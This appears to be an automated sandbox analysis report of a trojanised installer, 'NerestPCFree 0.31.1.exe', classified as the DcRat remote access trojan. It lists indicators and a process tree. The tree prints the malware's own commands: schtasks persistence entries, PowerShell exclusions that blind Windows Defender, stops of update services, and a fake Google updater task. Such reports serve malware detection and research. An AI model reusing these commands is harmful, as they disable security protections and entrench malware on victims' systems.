Analysis

  • max time kernel
    89s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    14/12/2024, 17:00 UTC

General

  • Target

    NerestPC free/NerestPCFree 0.31.1.exe

  • Size

    7.0MB

  • MD5

    9d0a77bd28d67eab798c50f0c6a24b64

  • SHA1

    2de59eddd73ab784cc8f791cd96d7f81741ccae3

  • SHA256

    a35479bc985fe56167b824f5d0d9ff96598af672afe8785bc9f87815c11393dc

  • SHA512

    25ca283707b61c8149615f7e7958edb886378702ecbcf079191698d686b4a7a39d1be655e44ccf2752e569481e9eb25f3a10e59322c0c97c7e858fb5f9eabb17

  • SSDEEP

    196608:i46iIYMaKuKGfjtVlQqtolrkiBJk3b8pA2uW3c:i7YpBDtVlmlgyJ0r

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 5 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 44 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:480
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:604
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1544
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                • Checks BIOS information in registry
                • Checks processor information in registry
                • Enumerates system info in registry
                PID:2116
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1748
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1860
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2368
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Windows\ShellNew\smss.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2752
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\ShellNew\smss.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2924
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\ShellNew\smss.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1164
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:424
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1752
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2080
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1772
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1564
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\smss.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2260
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Windows\security\services.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2656
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\security\services.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:1140
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Windows\security\services.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2512
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 5 /tr "'C:\fontwin\MsServerHost.exe'" /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2276
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MsServerHost" /sc ONLOGON /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2364
                • C:\Windows\system32\schtasks.exe
                  schtasks.exe /create /tn "MsServerHostM" /sc MINUTE /mo 9 /tr "'C:\fontwin\MsServerHost.exe'" /rl HIGHEST /f
                  4⤵
                  • Process spawned unexpected child process
                  • Scheduled Task/Job: Scheduled Task
                  PID:2236
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k RPCSS
              2⤵
                PID:684
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                2⤵
                • Indicator Removal: Clear Windows Event Logs
                PID:752
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                2⤵
                  PID:808
                  • C:\Windows\system32\Dwm.exe
                    "C:\Windows\system32\Dwm.exe"
                    3⤵
                      PID:1168
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs
                    2⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:856
                    • C:\Windows\system32\taskeng.exe
                      taskeng.exe {D6F7DE9C-44A2-4460-BAC8-6EFAF9F8DFE6} S-1-5-18:NT AUTHORITY\System:Service:
                      3⤵
                      • Loads dropped DLL
                      PID:292
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        4⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Drops file in Program Files directory
                        PID:1496
                    • C:\Windows\system32\wbem\WMIADAP.EXE
                      wmiadap.exe /F /T /R
                      3⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:988
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService
                    2⤵
                      PID:964
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k NetworkService
                      2⤵
                        PID:112
                      • C:\Windows\System32\spoolsv.exe
                        C:\Windows\System32\spoolsv.exe
                        2⤵
                          PID:1020
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                          2⤵
                            PID:1060
                          • C:\Windows\system32\taskhost.exe
                            "taskhost.exe"
                            2⤵
                              PID:1100
                            • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                              "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                              2⤵
                                PID:836
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                2⤵
                                  PID:2448
                                • C:\Windows\system32\sppsvc.exe
                                  C:\Windows\system32\sppsvc.exe
                                  2⤵
                                    PID:2056
                                • C:\Windows\system32\lsass.exe
                                  C:\Windows\system32\lsass.exe
                                  1⤵
                                    PID:496
                                  • C:\Windows\system32\lsm.exe
                                    C:\Windows\system32\lsm.exe
                                    1⤵
                                      PID:504
                                    • C:\Windows\Explorer.EXE
                                      C:\Windows\Explorer.EXE
                                      1⤵
                                        PID:1200
                                        • C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe
                                          "C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"
                                          2⤵
                                          • Loads dropped DLL
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of WriteProcessMemory
                                          PID:1504
                                          • C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe
                                            "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of WriteProcessMemory
                                            PID:1036
                                            • C:\Windows\SysWOW64\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2780
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "
                                                5⤵
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                PID:1876
                                                • C:\fontwin\MsServerHost.exe
                                                  "C:\fontwin/MsServerHost.exe"
                                                  6⤵
                                                  • Modifies WinLogon for persistence
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  • Drops file in Program Files directory
                                                  • Drops file in Windows directory
                                                  PID:3040
                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yuqn5vbi\yuqn5vbi.cmdline"
                                                    7⤵
                                                    • Drops file in System32 directory
                                                    PID:2812
                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES162F.tmp" "c:\Windows\System32\CSC7D2F785B976C42AAA316FD7FCBF052.TMP"
                                                      8⤵
                                                        PID:1820
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1752
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1612
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2988
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2404
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2748
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2372
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1136
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1532
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2984
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2584
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:308
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:3032
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2564
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\WmiPrvSE.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2320
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellNew\smss.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:3020
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\audiodg.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:340
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\smss.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2248
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\security\services.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1972
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:1500
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\jKkZYzVQ86.bat"
                                                      7⤵
                                                        PID:2572
                                                        • C:\Windows\system32\chcp.com
                                                          chcp 65001
                                                          8⤵
                                                            PID:2804
                                                          • C:\Windows\system32\PING.EXE
                                                            ping -n 10 localhost
                                                            8⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            • Runs ping.exe
                                                            PID:1712
                                                          • C:\Windows\ShellNew\smss.exe
                                                            "C:\Windows\ShellNew\smss.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:2156
                                                • C:\Users\Admin\AppData\Local\Temp\twain32.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\twain32.exe"
                                                  3⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1536
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2948
                                              • C:\Windows\System32\cmd.exe
                                                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                2⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2360
                                                • C:\Windows\System32\sc.exe
                                                  sc stop UsoSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2972
                                                • C:\Windows\System32\sc.exe
                                                  sc stop WaaSMedicSvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:3060
                                                • C:\Windows\System32\sc.exe
                                                  sc stop wuauserv
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2272
                                                • C:\Windows\System32\sc.exe
                                                  sc stop bits
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2476
                                                • C:\Windows\System32\sc.exe
                                                  sc stop dosvc
                                                  3⤵
                                                  • Launches sc.exe
                                                  PID:2852
                                              • C:\Windows\System32\cmd.exe
                                                C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                2⤵
                                                • Power Settings
                                                • Suspicious use of WriteProcessMemory
                                                PID:2996
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:556
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1520
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1276
                                                • C:\Windows\System32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  3⤵
                                                  • Power Settings
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2836
                                              • C:\Windows\System32\dialer.exe
                                                C:\Windows\System32\dialer.exe
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:2692
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:2700
                                                • C:\Windows\system32\schtasks.exe
                                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                  3⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1604
                                              • C:\Windows\System32\schtasks.exe
                                                C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                2⤵
                                                  PID:1440
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                  2⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Modifies data under HKEY_USERS
                                                  PID:2340
                                                • C:\Windows\System32\cmd.exe
                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                  2⤵
                                                    PID:1344
                                                    • C:\Windows\System32\sc.exe
                                                      sc stop UsoSvc
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:2240
                                                    • C:\Windows\System32\sc.exe
                                                      sc stop WaaSMedicSvc
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:2552
                                                    • C:\Windows\System32\sc.exe
                                                      sc stop wuauserv
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:2896
                                                    • C:\Windows\System32\sc.exe
                                                      sc stop bits
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:596
                                                    • C:\Windows\System32\sc.exe
                                                      sc stop dosvc
                                                      3⤵
                                                      • Launches sc.exe
                                                      PID:1936
                                                  • C:\Windows\System32\cmd.exe
                                                    C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                    2⤵
                                                    • Power Settings
                                                    PID:1612
                                                    • C:\Windows\System32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-ac 0
                                                      3⤵
                                                      • Power Settings
                                                      PID:1472
                                                    • C:\Windows\System32\powercfg.exe
                                                      powercfg /x -hibernate-timeout-dc 0
                                                      3⤵
                                                      • Power Settings
                                                      PID:668
                                                    • C:\Windows\System32\powercfg.exe
                                                      powercfg /x -standby-timeout-ac 0
                                                      3⤵
                                                      • Power Settings
                                                      PID:2560
                                                    • C:\Windows\System32\powercfg.exe
                                                      powercfg /x -standby-timeout-dc 0
                                                      3⤵
                                                      • Power Settings
                                                      PID:1292
                                                  • C:\Windows\System32\dialer.exe
                                                    C:\Windows\System32\dialer.exe
                                                    2⤵
                                                      PID:316
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      PID:2988
                                                      • C:\Windows\system32\schtasks.exe
                                                        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                                                        3⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:2080
                                                    • C:\Windows\System32\dialer.exe
                                                      C:\Windows\System32\dialer.exe
                                                      2⤵
                                                        PID:2544
                                                      • C:\Windows\System32\dialer.exe
                                                        C:\Windows\System32\dialer.exe
                                                        2⤵
                                                        • Modifies data under HKEY_USERS
                                                        PID:1252
                                                    • C:\Windows\system32\conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe "1221055517-2055351782-1614951340127003608512537440141364892741-213209618-1511003925"
                                                      1⤵
                                                        PID:2960
                                                      • C:\Windows\system32\conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe "-12877538551741513258186840011-18980561041552295991-1851439976119204996-808245150"
                                                        1⤵
                                                          PID:2708
                                                        • C:\Windows\system32\conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe "2280248081599670161-4343298021211491651-13160984759117423621851624753-1834149440"
                                                          1⤵
                                                            PID:2804
                                                          • C:\Windows\system32\conhost.exe
                                                            \??\C:\Windows\system32\conhost.exe "835523354-569751979784133578-113343149-1126385063870397016-1899975981-1320380874"
                                                            1⤵
                                                              PID:900
                                                            • C:\Windows\system32\conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe "-576777164366393762779214399748602657166111699813106459201173452456-666023283"
                                                              1⤵
                                                                PID:2768
                                                              • C:\Windows\system32\conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe "-2103982051-1801922608-16175857331568465300-915912905755678840264412723-1830903136"
                                                                1⤵
                                                                  PID:1608
                                                                • C:\Windows\system32\conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe "10218160038322182391695975732-20390870221547766196-3331441591361976274585719027"
                                                                  1⤵
